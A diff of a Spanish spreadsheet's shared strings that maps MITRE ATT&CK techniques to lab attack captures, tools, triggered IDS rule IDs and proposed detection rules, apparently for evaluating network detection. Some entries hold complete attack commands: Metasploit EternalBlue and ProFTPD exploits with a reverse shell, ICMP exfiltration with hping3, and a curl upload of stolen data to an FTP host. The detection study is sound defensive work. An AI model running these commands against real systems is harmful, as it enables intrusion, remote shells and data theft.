+    <t>Uso de exploit Eternalblue para obtener movimiento lateral y establecimiento de meterpreter. Comando: msfconsole -x "use exploit/windows/smb/ms17_010_eternalblue; set RHOSTS 192.168.2.2; set LHOST 192.168.1.3; run -z; sessions -c getuid; sessions -k 1; exit"</t>
+  </si>
+  <si>
+    <t>Ataque Web</t>
+  </si>
+  <si>
+    <t>DVWA, In-house selenium framework</t>
+  </si>
+  <si>
+    <t>T1210-web_attack-C2018.pcapng</t>
+  </si>
+  <si>
+    <t>Ejecución de código remoto basado en vulnerabilidades de servidor FTP</t>
+  </si>
+  <si>
+    <t>T1210-remote_code_execution.pcapng</t>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FFFF0000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>34225,34447,34224</t>
+    </r>
     <r>
       <rPr>
         <rFont val="Arial, sans-serif"/>
         <color rgb="FF000000"/>
         <sz val="11.0"/>
       </rPr>
-      <t xml:space="preserve">
-2027792, 2027793, 2027326, </t>
-    </r>
+      <t>,50447</t>
+    </r>
+  </si>
+  <si>
     <r>
       <rPr>
         <rFont val="Arial, sans-serif"/>
         <color rgb="FFFF0000"/>
         <sz val="11.0"/>
       </rPr>
-      <t>44489</t>
-    </r>
-  </si>
-  <si>
+      <t>2002752,2002749,2010732,34225,34447,34224,</t>
+    </r>
     <r>
       <rPr>
         <rFont val="Arial, sans-serif"/>
         <color rgb="FF000000"/>
         <sz val="11.0"/>
       </rPr>
-      <t xml:space="preserve">
-2027792, 2027793, 2027326, </t>
+      <t>50447</t>
+    </r>
+  </si>
+  <si>
+    <t xml:space="preserve">Regla genérica que detecte intento de ejecucion remota de codigo en servidor FTP </t>
+  </si>
+  <si>
+    <t>Uso de comandos SITE/CPFR/CPTO en la version 1.3.5 de ProFTPD  que permite copiar ficheros a cualquier usuario no autenticado. Comando: msfconsole -x "use exploit/unix/ftp/proftpd_modcopy_exec; set RHOSTS 192.168.2.2; set SITEPATH /var/www/html; set LHOST 192.168.1.3; set LPORT 4444; set payload cmd/unix/reverse_perl; run -z; sessions -c ls; sessions -k 1; exit"</t>
+  </si>
+  <si>
+    <t>Remote Service Session Hijacking</t>
+  </si>
+  <si>
+    <t>T1563</t>
+  </si>
+  <si>
+    <t>RDP Hijacking</t>
+  </si>
+  <si>
+    <t>T1563.002</t>
+  </si>
+  <si>
+    <t>Secuestro de sesión RDP mediante tscon.exe</t>
+  </si>
+  <si>
+    <t>tscon.exe</t>
+  </si>
+  <si>
+    <t>Regla genérica para detectar conexiones RDP entre un orígen y un servidor o destino</t>
+  </si>
+  <si>
+    <t>Uso de Windows Server 2012 R2 con DNS, Active Directory y Servicio de Escritorio Remoto</t>
+  </si>
+  <si>
+    <t>Lateral Tool Transfer</t>
+  </si>
+  <si>
+    <t>T1570</t>
+  </si>
+  <si>
+    <t>Transferencia de herramientas para la continuación del ataque entre máquinas utilizando protocolos de compartición de archivos</t>
+  </si>
+  <si>
+    <t>T1570.pcapng</t>
+  </si>
+  <si>
+    <t>Transferencia mediante FTP de ficheros entre dos equipos</t>
+  </si>
+  <si>
+    <t>Internal Spear-phishing</t>
+  </si>
+  <si>
+    <t>T1534</t>
+  </si>
+  <si>
+    <t>Phishing interno entre equipos pertenecientes a un dominio con servidor de correo habilitado</t>
+  </si>
+  <si>
+    <t>MailEnabler, Thunderbird</t>
+  </si>
+  <si>
+    <t>T1534_internal-spearphishing.pcapng</t>
+  </si>
+  <si>
+    <t>Detección por anomalías, análisis de la estructura de correos electrónicos, petición de información confidencial, etc</t>
+  </si>
+  <si>
+    <t>Network Service Discovery</t>
+  </si>
+  <si>
+    <t>T1046</t>
+  </si>
+  <si>
+    <t>Descubrimiento de servicios y version</t>
+  </si>
+  <si>
+    <t>Nikto</t>
+  </si>
+  <si>
+    <t>T1046_version_services_detection1.pcapng</t>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FF000000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t xml:space="preserve">2002677, </t>
     </r>
     <r>
       <rPr>
@@ -3030,7 +3962,7 @@
         <color rgb="FFFF0000"/>
         <sz val="11.0"/>
       </rPr>
-      <t>44489</t>
+      <t>2101071</t>
     </r>
     <r>
       <rPr>
@@ -3038,7 +3970,17 @@
         <color rgb="FF000000"/>
         <sz val="11.0"/>
       </rPr>
-      <t xml:space="preserve">, 2002752, 2002749, </t>
+      <t>, 2101242, 2027262, 2016141, 2101129, 2100987, 2027265, 2027250, 2018752, 2027263, 2101245, 2027253, 2101145, 2010766, 2100993, 2101256, 2101016, 2019714, 2101402, 2049400, 2009362, 2009361, 2101401, 2030337, 2101244, 2049401, 2011042, 2010963, 2006446, 2006445, 2009714, 2019526, 2101877, 2101108, 2016184, 2100952, 2100977, 2100958, 2100961, 2100965, 2011141, 2011144, 2011142, 2011143, 2021390, 2101201, 2101013, 2101487, 2101018, 2009485, 2102073, 2049402, 2101874, 2100953, 2100951, 2100959, 2100981, 2100982, 2101403, 2016182, 2011696, 2011564, 2009317, 2009318, 2010920, 2009931, 2010475, 2012795, 2009384, 2009391, 2009369, 2012369, 2002879, 2010485, 2008897, 2017442, 2010260, 2009933, 2012013, 2009051, 2010354, 2008833, 2010355, 2009892, 2009316, 2010197, 2010276, 2010466, 2017441, 2010362, 2010473, 2009932, 2011274, 2010124, 2010564, 2010125, 2011384, 2011259, 2017440, 2010484, 2009887, 2009325, 2009326, 2009229, 2009071, 2019524, 2002901, 2014180, 2010254, 2017436</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FF000000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t xml:space="preserve">50447, 300003, 31940, 2002677, </t>
     </r>
     <r>
       <rPr>
@@ -3046,7 +3988,7 @@
         <color rgb="FFFF0000"/>
         <sz val="11.0"/>
       </rPr>
-      <t>2101620</t>
+      <t>2101071</t>
     </r>
     <r>
       <rPr>
@@ -3054,71 +3996,23 @@
         <color rgb="FF000000"/>
         <sz val="11.0"/>
       </rPr>
-      <t>, 2044666, 2051116</t>
-    </r>
-  </si>
-  <si>
-    <t>2002752, 2101620, 2002749</t>
-  </si>
-  <si>
-    <t>La detección de la creación del canal es posible para este caso concreto. Sin embargo, si ambos canales, tanto primario como secundario están establecidos, y no se ha detectado su creación, el cambio de uno a otro es inapreciable por el cortafuegos.</t>
-  </si>
-  <si>
-    <t>Web Service</t>
-  </si>
-  <si>
-    <t>T1102</t>
-  </si>
-  <si>
-    <t>One-Way Communication</t>
-  </si>
-  <si>
-    <t>T1102.003</t>
-  </si>
-  <si>
-    <t>Subida de información confidencial a Workspace de Google Drive</t>
-  </si>
-  <si>
-    <t>Covenant, Google Drive API</t>
-  </si>
-  <si>
-    <t>T1102.003_web-service-one-way-communication.pcapng</t>
-  </si>
-  <si>
-    <t>2027792, 2027793, 2002752, 2002749, 2100628</t>
-  </si>
-  <si>
-    <t>Detección por anomalías, observando actividad inusual relacionada con el uso de servicios web (subidas pesadas de información a la nube, comunicación periódica con servidores web concretos, etc)</t>
-  </si>
-  <si>
-    <t>Proxy</t>
-  </si>
-  <si>
-    <t>T1090</t>
-  </si>
-  <si>
-    <t>Internal Proxy</t>
-  </si>
-  <si>
-    <t>T1090.001</t>
-  </si>
-  <si>
-    <t>Uso de Equipo interno como Proxy para el ataque C2</t>
-  </si>
-  <si>
-    <t>T1090_proxy-internal-proxy.pcapng</t>
-  </si>
-  <si>
-    <t>2027794, 2027793, 2027792</t>
-  </si>
-  <si>
+      <t xml:space="preserve">, 2101242, 2027262, 2016141, </t>
+    </r>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FFFF0000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>2101129</t>
+    </r>
     <r>
       <rPr>
         <rFont val="Arial, sans-serif"/>
         <color rgb="FF000000"/>
         <sz val="11.0"/>
       </rPr>
-      <t xml:space="preserve">2027794, 2027793, 2027792, </t>
+      <t xml:space="preserve">, </t>
     </r>
     <r>
       <rPr>
@@ -3126,17 +4020,25 @@
         <color rgb="FFFF0000"/>
         <sz val="11.0"/>
       </rPr>
-      <t>50447</t>
-    </r>
-  </si>
-  <si>
+      <t>2100987</t>
+    </r>
     <r>
       <rPr>
         <rFont val="Arial, sans-serif"/>
         <color rgb="FF000000"/>
         <sz val="11.0"/>
       </rPr>
-      <t xml:space="preserve">2027794, 2027793, 2027792, </t>
+      <t>, 2027265, 2027250, 2018752, 2027263, 2101245, 2027253, 2101145, 2010766, 2100993, 2101256, 2101016, 2019714, 2101402, 2049400, 2009362, 2009361, 2101401, 2030337, 2101244, 2049401, 2011042, 2010963, 2006446, 2006445, 2009714, 2019526, 2101877, 2101108, 2016184, 2100952, 2100977, 2100958, 2100961, 2100965, 2011141, 2011144, 2011142, 2011143, 2021390, 2101201, 2101013, 2101487, 2101018, 2009485, 2102073, 2049402, 2101874, 2100953, 2100951, 2100959, 2100981, 2100982, 2101403, 2016182, 2011696, 2011564, 2009317, 2009318, 2010920, 2009931, 2010475, 2012795, 2009384, 2009391, 2009369, 2012369, 2002879, 2010485, 2008897, 2017442, 2010260, 2009933, 2012013, 2009051, 2010354, 2008833, 2010355, 2009892, 2009316, 2010197, 2010276, 2010466, 2017441, 2010362, 2010473, 2009932, 2011274, 2010124, 2010564, 2010125, 2011384, 2011259, 2017440, 2010484, 2009887, 2009325, 2009326, 2009229, 2009071, 2019524, 2002901, 2014180, 2010254, 2017436</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FF000000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t xml:space="preserve">50447, 300003, 31940, 2002752, 2002749, 2002677, </t>
     </r>
     <r>
       <rPr>
@@ -3144,7 +4046,7 @@
         <color rgb="FFFF0000"/>
         <sz val="11.0"/>
       </rPr>
-      <t>50447</t>
+      <t>2101071</t>
     </r>
     <r>
       <rPr>
@@ -3152,79 +4054,695 @@
         <color rgb="FF000000"/>
         <sz val="11.0"/>
       </rPr>
-      <t xml:space="preserve">, 2002752, 2002749, 2101620 </t>
-    </r>
-  </si>
-  <si>
-    <t>Aunque sí es detectable la conexión C2 directa con el atacante, no existe un mecanismo de detección concreto que pueda identificar el uso de un proxy, más allá de una detección por anomalías, como la repetición de paquetes, dando a entender que un equipo interno está replicando paquetes, y por tanto está actuando como proxy</t>
-  </si>
-  <si>
-    <t>Data Obfuscation</t>
-  </si>
-  <si>
-    <t>T1001</t>
-  </si>
-  <si>
-    <t>Protocol Impersonation</t>
-  </si>
-  <si>
-    <t>T1001.003</t>
-  </si>
-  <si>
-    <t>Falsificación de protocolos de conexión segura como SSL o TLS</t>
-  </si>
-  <si>
-    <t>FakeTLS (raykaryshyn Github)</t>
-  </si>
-  <si>
-    <t>T1001_data-obfuscation-protocol-impersonation.pcapng</t>
-  </si>
-  <si>
-    <t>20022752, 2002749</t>
-  </si>
-  <si>
-    <t>Regla personalizada que compruebe el campo Server Name y mediante DNS asegure si se corresponde con la dirección IP a la que se está accediendo.</t>
-  </si>
-  <si>
-    <t>Steganography</t>
-  </si>
-  <si>
-    <t>T1001.002</t>
-  </si>
-  <si>
-    <t>Inserción de información confidencial en una imagen JPG</t>
-  </si>
-  <si>
-    <t>Covenant, SSH, scp, Powershell</t>
-  </si>
-  <si>
-    <t>T1001.002_data-obfuscation-steganography.pcapng</t>
-  </si>
-  <si>
-    <t xml:space="preserve">Detección por anomalías y/o estegoanálisis, envío de imágenes o ficheros con formato poco común entre equipos, existencia de ficheros comprimidos sospechosos, etc. </t>
-  </si>
-  <si>
-    <t>Ingress Tool Transfer</t>
-  </si>
-  <si>
-    <t>T1105</t>
-  </si>
-  <si>
-    <t>Transferencia de archivos de un servidor C2 a un equipo previamente comprometido</t>
-  </si>
-  <si>
-    <t>Metasploit, FTP</t>
-  </si>
-  <si>
-    <t>T1105.pcapng</t>
-  </si>
-  <si>
+      <t xml:space="preserve">, 2101242, 2027262, 2016141, 2003595, </t>
+    </r>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FFFF0000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>2101129</t>
+    </r>
     <r>
       <rPr>
         <rFont val="Arial, sans-serif"/>
         <color rgb="FF000000"/>
         <sz val="11.0"/>
       </rPr>
+      <t xml:space="preserve">, </t>
+    </r>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FFFF0000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>2100987</t>
+    </r>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FF000000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>, 2027265, 2027250, 2018752, 2027263, 2009885, 2101245, 2100971, 2027253, 2101852, 2101145, 2010767, 2010766, 2102056, 2101288, 2101738, 2009151, 2001343, 2100993, 2101256, 2003099, 2101016, 2019714, 2101402, 2014379, 2011031, 2049400, 2009362, 2009361, 2101002, 2101945, 2101401, 2101829, 2012911, 2030337, 2101244, 2101122, 2100988, 2049401, 2001949, 2012913, 2011042, 2010963, 2006446, 2006445, 2011040, 2009714, 2001218, 2101827, 2004589, 2019526, 2004592, 2101877, 2101108, 2100915, 2016184, 2009001, 2020296, 2002731, 2100937, 2100952, 2100977, 2100958, 2100961, 2100965, 2101847, 2101111, 2011141, 2011144, 2011142, 2011143, 2002070, 2021390, 2101201, 2101013, 2101193, 2101023, 2101487, 2101018, 2101372, 2009485, 2009884, 2102073, 2102131, 2049402, 2101156, 2101874, 2100953, 2100951, 2100959, 2101110, 2101489, 2100981, 2100982, 2101403, 2101332, 2002133, 2016182, 2011696, 2010377, 2009435, 2003670, 2011564, 2009167, 2010095, 2009317, 2009318, 2003740, 2009397, 2002681, 2010920, 2009931, 2009848, 2009321, 2010475, 2009311, 2009313, 2012795, 2009382, 2009367, 2009757, 2009758, 2009759, 2009755, 2009756, 2009760, 2009754, 2009466, 2009467, 2009468, 2009384, 2009059, 2009060, 2009061, 2009062, 2009877, 2009391, 2009369, 2012369, 2002879, 2010485, 2008897, 2009871, 2009872, 2009873, 2009196, 2003738, 2010099, 2003699, 2017442, 2009459, 2009898, 2009166, 2003677, 2003682, 2003704, 2010260, 2009933, 2012013, 2008826, 2009307, 2009051, 2010354, 2002815, 2009788, 2010027, 2003678, 2003679, 2009225, 2010252, 2008833, 2010355, 2009793, 2003731, 2009163, 2003688, 2003696, 2009892, 2009398, 2002800, 2003703, 2100884, 2003729, 2003728, 2003727, 2003726, 2009316, 2009101, 2010197, 2008904, 2008903, 2010276, 2008900, 2008901, 2008902, 2010126, 2003671, 2010466, 2003739, 2003333, 2008922, 2009427, 2002902, 2008871, 2003680, 2017441, 2003698, 2003701, 2008879, 2010362, 2009381, 2009386, 2010473, 2009188, 2009903, 2008899, 2009180, 2003737, 2003717, 2003517, 2009932, 2011274, 2003732, 2003733, 2003718, 2003700, 2003689, 2009364, 2010124, 2010564, 2010125, 2002996, 2003331, 2011384, 2011259, 2003672, 2003673, 2003674, 2003675, 2003676, 2017440, 2009415, 2003660, 2003661, 2003664, 2010484, 2003662, 2009372, 2003663, 2003665, 2003666, 2003667, 2003668, 2003681, 2003694, 2002898, 2009887, 2003705, 2003706, 2003707, 2003708, 2003715, 2003709, 2003711, 2003713, 2003712, 2003710, 2003714, 2003867, 2003693, 2009370, 2009371, 2008964, 2009504, 2009502, 2009723, 2003702, 2009325, 2009326, 2008962, 2009164, 2003720, 2003719, 2003721, 2009123, 2009506, 2009229, 2003741, 2003743, 2003744, 2003745, 2009071, 2008996, 2009179, 2019524, 2002901, 2009333, 2009733, 2003669, 2009656, 2009653, 2009378, 2009717, 2009379, 2014180, 2010254, 2003716, 2017436, 2003692, 2003747, 2003686, 2009190, 2011160</t>
+    </r>
+  </si>
+  <si>
+    <t>Múltiples mecanismos. Por ejemplo, regla que detecte un escaneo de puertos (alto número de peticiones hacia un rango de puertos en poco tiempo)</t>
+  </si>
+  <si>
+    <t>T1046_version_services_detection2.pcapng</t>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FF000000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>384,453,408,451,1421,1420,1418,257,</t>
+    </r>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FFFF0000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>598</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FF000000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>2010937,2010939,2010938</t>
+    </r>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FFFF0000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>,2002911</t>
+    </r>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FF000000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>,2010936,2010935,</t>
+    </r>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FFFF0000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>2002910</t>
+    </r>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FF000000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>,2100257,2100598,2009358,2024364,384,453,408,451,1421,1420,1418,257,598</t>
+    </r>
+  </si>
+  <si>
+    <t>2010937, 2002910, 2010935</t>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FFFF0000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>2010937,2010939,2010938,2002911,2010936,2010935,2002910,2100257,2100598</t>
+    </r>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FF000000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>,</t>
+    </r>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FFFF0000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>2009358</t>
+    </r>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FF000000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>,2024364,384,453,408,451,1421,1420,1418,257,598,36650,13586,50447</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FF000000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>2100469,2100384,</t>
+    </r>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FFFF0000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>2002752,2002749,2009582,2000538</t>
+    </r>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FF000000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>,2100453,2100408,2100451,2010937,2001689,2010939,2010938,2002911,2100615,2010936,2010935,</t>
+    </r>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FFFF0000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>2002910</t>
+    </r>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FF000000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>,2101420,2101418,2100257,2100598,</t>
+    </r>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FFFF0000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>2009358</t>
+    </r>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FF000000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>,2024364,384,453,408,451,1421,1420,1418,257,598,36650,13586,50447</t>
+    </r>
+  </si>
+  <si>
+    <t>2100384, 2002752, 2100615, 2009582, 2100469, 2010935, 2100408, 2010937, 2002749, 2002910, 2002911</t>
+  </si>
+  <si>
+    <t>DDos + Escaneo de puertos</t>
+  </si>
+  <si>
+    <t>T1046-C2018-FIX.pcapng</t>
+  </si>
+  <si>
+    <t>2035480, 2025644</t>
+  </si>
+  <si>
+    <t>2002749, 2002752, 2035480, 20000419, 2025644</t>
+  </si>
+  <si>
+    <t>En determinadas circunstancias, si el envío de paquetes constituye una amenaza de denegación de servicio, podría detectarse el envío masivo de paquetes</t>
+  </si>
+  <si>
+    <t>Remote System Discovery</t>
+  </si>
+  <si>
+    <t>T1018</t>
+  </si>
+  <si>
+    <t>Descubrimiento de servicios y puertos</t>
+  </si>
+  <si>
+    <t>T1018.pcapng</t>
+  </si>
+  <si>
+    <t>2010937, 2010935, 2010936, 2010939, 2002910, 200911</t>
+  </si>
+  <si>
+    <t>2010937, 2010935, 2010936, 2010939, 2002910, 200911, 2002752, 2002749, 2101418, 2100615</t>
+  </si>
+  <si>
+    <t>2002752, 2100615, 2010935, 2010937, 2002749, 2002910</t>
+  </si>
+  <si>
+    <t>Regla que detecte envío de mútliples peticiones a un rango de puertos en un tiempo determinado</t>
+  </si>
+  <si>
+    <t>Group Policy Discovery</t>
+  </si>
+  <si>
+    <t>T1615</t>
+  </si>
+  <si>
+    <t>Comandos mediante Powershell para obtener información sobre configuraciones de políticas de grupo</t>
+  </si>
+  <si>
+    <t>T1615.pcapng</t>
+  </si>
+  <si>
+    <t>Detección por anomalías</t>
+  </si>
+  <si>
+    <t>Ejecución de comandos mediante Powershell para comprobar políticas de grupo</t>
+  </si>
+  <si>
+    <t>System Owner</t>
+  </si>
+  <si>
+    <t>T1033</t>
+  </si>
+  <si>
+    <t>Descubrimiento de sesión de usuario en equipo remoto</t>
+  </si>
+  <si>
+    <t>quser, qwinsta</t>
+  </si>
+  <si>
+    <t>T1033_system-owner.pcapng</t>
+  </si>
+  <si>
+    <t>44489, 2002752, 2002749, 2044666, 2051116</t>
+  </si>
+  <si>
+    <t>Regla que detecte múltiples interacciones con la API LSM_API_service del servicio RPC desde el mismo equipo origen.</t>
+  </si>
+  <si>
+    <t>Domain Trust Discovery</t>
+  </si>
+  <si>
+    <t>T1482</t>
+  </si>
+  <si>
+    <t>Descubrimiento de dominios de confianza en entorno Active Directory</t>
+  </si>
+  <si>
+    <t>dsquery</t>
+  </si>
+  <si>
+    <t>T1482_domain-trust-discovery.pcapng</t>
+  </si>
+  <si>
+    <t>Regla personalizada que detecte paquetes LDAP, procedentes de equipos que no son DC en la red (configurable manualmente) y con la cadena objectClass=trustedDomain</t>
+  </si>
+  <si>
+    <t>Exfiltration</t>
+  </si>
+  <si>
+    <t>Exfiltration Over Alternative Protocol</t>
+  </si>
+  <si>
+    <t>T1048</t>
+  </si>
+  <si>
+    <t>Exfiltration Over Unencrypted Non-C2 Protocol</t>
+  </si>
+  <si>
+    <t>T1048.003</t>
+  </si>
+  <si>
+    <t>Exfiltración por ICMP</t>
+  </si>
+  <si>
+    <t xml:space="preserve">T1048.003-exfiltration_over_ICMP.pcapng </t>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FFFF0000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>29456</t>
+    </r>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FF000000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>,384,408</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FFFF0000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>29456</t>
+    </r>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FF000000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>,384,408</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FF000000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>31767,</t>
+    </r>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FFFF0000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>29456</t>
+    </r>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FF000000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>,384,408</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FF000000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>2100384,2002752,2002749,2100408,</t>
+    </r>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FFFF0000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>29456</t>
+    </r>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FF000000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>,384,408,31767</t>
+    </r>
+  </si>
+  <si>
+    <t>2100384, 2002752, 2002749, 2100408</t>
+  </si>
+  <si>
+    <t>Regla genérica que detecte PING inusual.</t>
+  </si>
+  <si>
+    <t>Exfiltracion mediante protocolo ICMP. Envia varios echo Request que contienen como datos el contenido de ese fichero. Comando: echo "Esto es un exfiltración sobre ICMP" &gt; file;timeout 15s hping3 --file ./file --data 36 192.168.2.2 --icmp</t>
+  </si>
+  <si>
+    <t>Exfiltration Over Other Network Medium</t>
+  </si>
+  <si>
+    <t>T1011</t>
+  </si>
+  <si>
+    <t>Exfiltration Over Bluetooth</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> T1011.001</t>
+  </si>
+  <si>
+    <t>Extracción via Bluetooth</t>
+  </si>
+  <si>
+    <t>Covenant, btobex, Bluetooth</t>
+  </si>
+  <si>
+    <t>T1011_exfiltration-over-bluetooth.pcapng</t>
+  </si>
+  <si>
+    <t>Detección por anomalías en red Bluetooth. Envío y/o recepción de información comprometida por la red Bluetooth</t>
+  </si>
+  <si>
+    <t>Automated Exfiltration</t>
+  </si>
+  <si>
+    <t>T1020</t>
+  </si>
+  <si>
+    <t>Traffic Duplication</t>
+  </si>
+  <si>
+    <t>T1020.001</t>
+  </si>
+  <si>
+    <t>Ejecución de script en Python para activar el reenvío de paquetes en el equipo víctima</t>
+  </si>
+  <si>
+    <t>SSH, Scapy</t>
+  </si>
+  <si>
+    <t>T1020.001_automated-exfiltration-traffic-duplication.pcapng</t>
+  </si>
+  <si>
+    <t>Detección por anomalías en red que detecte el envío duplicado de paquetes procedentes de un mismo origen interno a la organización</t>
+  </si>
+  <si>
+    <t>Scheduled Transfer</t>
+  </si>
+  <si>
+    <t>T1029</t>
+  </si>
+  <si>
+    <t>Comunicación C2 para el establecimiento de extracción programada</t>
+  </si>
+  <si>
+    <t>Covenant, Powershell</t>
+  </si>
+  <si>
+    <t>T1029_scheduled-transfer.pcapng</t>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FFFF0000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>2027792, 2027793</t>
+    </r>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FF000000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>, 2002752, 2002749, 2101917</t>
+    </r>
+  </si>
+  <si>
+    <t>Detección por anomalías, basada en el descubrimiento de eventos programados que no han sido creados por el usuario.</t>
+  </si>
+  <si>
+    <t>Exfiltración por FTP</t>
+  </si>
+  <si>
+    <t>Caldera</t>
+  </si>
+  <si>
+    <t>T1048.003-exfiltration_over_FTP.pcapng</t>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FF000000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>2002752,2002749,2100472,2006409,2043217</t>
+    </r>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FFFF0000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>,2003303,2003410</t>
+    </r>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FF000000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>,2015016,50447</t>
+    </r>
+  </si>
+  <si>
+    <t>Exfiltracion de datos utilizando el protocolo FTP. Utilizando caldera y la operacion Advanced Thief. Comando: curl -T stage_to_steal.tar.gz.gpg ftp://172.16.1.2/VictimDirectory/ --user "dit:dit"</t>
+  </si>
+  <si>
+    <t>Data Transfer Size Limits</t>
+  </si>
+  <si>
+    <t>T1030</t>
+  </si>
+  <si>
+    <t>Dividir archivos para realizar transferencias menores a un umbral que provoque alertas</t>
+  </si>
+  <si>
+    <t>ftp, split</t>
+  </si>
+  <si>
+    <t>T1030.pcapng</t>
+  </si>
+  <si>
+    <t>Dependiendo la forma en la que se envien los archivos, puede ser indetectable. Sin embargo, si utiliza protocolos de transferencia de ficheros (FTP,SMB...) resulta importante monitorizar transferencias con un mismo tamaño de manera concurrente</t>
+  </si>
+  <si>
+    <t>Transferencia de ficheros mediante FTP, previamente divididos en paquetes de un tamaño constante</t>
+  </si>
+  <si>
+    <t>Transfer Data to Cloud Account</t>
+  </si>
+  <si>
+    <t>T1537</t>
+  </si>
+  <si>
+    <t>Transferir archivos de una cuenta a otra mediante un servicio en la nube</t>
+  </si>
+  <si>
+    <t>OneDrive</t>
+  </si>
+  <si>
